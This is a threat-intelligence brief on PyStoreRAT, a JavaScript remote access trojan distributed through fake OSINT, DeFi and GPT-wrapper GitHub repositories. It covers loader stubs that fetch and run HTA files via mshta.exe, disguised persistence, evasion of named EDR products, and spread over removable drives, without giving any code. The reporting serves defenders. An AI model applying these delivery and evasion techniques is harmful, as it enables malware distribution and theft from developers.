Key Findings

• A new campaign is leveraging GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) dubbed PyStoreRAT.

• The malicious repositories, often themed as development utilities or OSINT tools, contain code responsible for silently downloading and executing a remote HTA file.

• PyStoreRAT is a modular, multi-stage implant that can execute various payloads, including an information stealer known as Rhadamanthys.

• The threat actors behind the campaign leverage either newly created GitHub accounts or dormant ones to publish the repositories, stealthily slipping the malicious payload in the form of "maintenance" commits.

• The malware is designed for stealth and flexibility, adapting its launch method to evade specific security products and spreading through removable drives.

Background

The cybersecurity researchers are calling attention to a new campaign that's leveraging GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) dubbed PyStoreRAT. These repositories, often themed as development utilities or OSINT tools, contain only a few lines of code responsible for silently downloading a remote HTA file and executing it via 'mshta.exe.'

Malware Capabilities

PyStoreRAT has been described as a "modular, multi-stage" implant that can execute EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules. The malware also deploys an information stealer known as Rhadamanthys as a follow-on payload. It can profile the system, check for administrator privileges, and scan for cryptocurrency wallet-related files.

Delivery and Persistence

The attack chains involve distributing the malware through Python or JavaScript loader stubs embedded in GitHub repositories masquerading as OSINT tools, DeFi bots, GPT wrappers, and security-themed utilities. The threat actors leverage either newly created GitHub accounts or those that lay dormant for months to publish the repositories, stealthily slipping the malicious payload in the form of "maintenance" commits.

Persistence is achieved by setting up a scheduled task that's disguised as an NVIDIA app self-update. In the final stage, the malware contacts an external server to fetch commands to be executed on the host.

Evasion and Spreading

The malware is designed for stealth and flexibility, adapting its launch method to evade specific security products like CrowdStrike Falcon and products from CyberReason and ReasonLabs. It can also spread via removable drives by replacing legitimate documents with malicious Windows Shortcut (LNK) files.

Attribution

The presence of Russian-language artifacts and coding patterns in the malware suggests that the threat actors behind the operation are likely of Eastern European origin. However, the identity of the group remains unknown.

Conclusion

PyStoreRAT represents a shift toward modular, script-based implants that can adapt to security controls and deliver multiple payload formats. Its use of HTA/JS for execution, Python loaders for delivery, and Falcon-aware evasion logic creates a stealthy first-stage foothold that traditional EDR solutions detect only late in the infection chain.

Sources

• https://thehackernews.com/2025/12/fake-osint-and-gpt-utility-github-repos.html

• https://hackread.com/pystorerat-rat-malware-github-osint-researchers/